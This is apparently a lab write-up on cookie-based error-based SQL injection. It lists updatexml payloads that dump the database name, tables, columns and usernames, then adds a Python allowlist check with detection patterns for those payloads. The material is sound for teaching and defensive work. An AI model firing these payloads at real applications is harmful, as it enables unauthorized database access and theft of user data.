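After correct input is submitted, the page echoes the cookie back, so the injection point is presumably in the cookie:
Capture the request with Burp Suite to confirm the guess: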
Dump the database name:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#;
Dump the table names:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1)),0)#;
Dump the column names:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='users' limit 0,1)),0)#;
Dump the data:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#;
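
On the defending side, the requests above stand out because the uname cookie stops looking like a username. The following is an added example, not code from the original page: a check that parses a raw Cookie header, applies an allowlist to uname, and records which error-based injection markers are present for triage. The allowlist pattern, the marker names and the function names are assumptions made for this example.

```python
import re

# Assumption for this example: valid usernames are short and alphanumeric.
UNAME_ALLOWED = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Markers seen in the error-based payloads above. They are used for
# logging and triage only; the allowlist makes the accept/reject decision.
SQLI_MARKERS = {
    "error_function": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "quote_or_comment": re.compile(r"'|#|--\s|/\*"),
}

# Sample headers: the first is constructed, the other two are the
# database-name and table-name requests shown above.
SAMPLE_HEADERS = [
    "Cookie: uname=admin",
    "Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#;",
    "Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) "
    "from information_schema.tables where table_schema=database() limit 0,1)),0)#;",
]


def parse_cookie_header(line):
    """Split a raw 'Cookie:' line into {name: value}, tolerating odd values."""
    _, _, raw = line.partition(":")
    cookies = {}
    for part in raw.split(";"):
        # Only the first '=' separates name from value; later ones stay in the value.
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def inspect_uname(line):
    """Return (allowed, sorted marker names found) for the uname cookie."""
    value = parse_cookie_header(line).get("uname", "")
    hits = sorted(name for name, rx in SQLI_MARKERS.items() if rx.search(value))
    return bool(UNAME_ALLOWED.fullmatch(value)), hits


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        allowed, hits = inspect_uname(header)
        print("ALLOW" if allowed else "REJECT", hits, header[:60])
```

Rejecting or flagging the value does not replace binding the cookie as a query parameter on the server, which is what stops the value from being parsed as SQL.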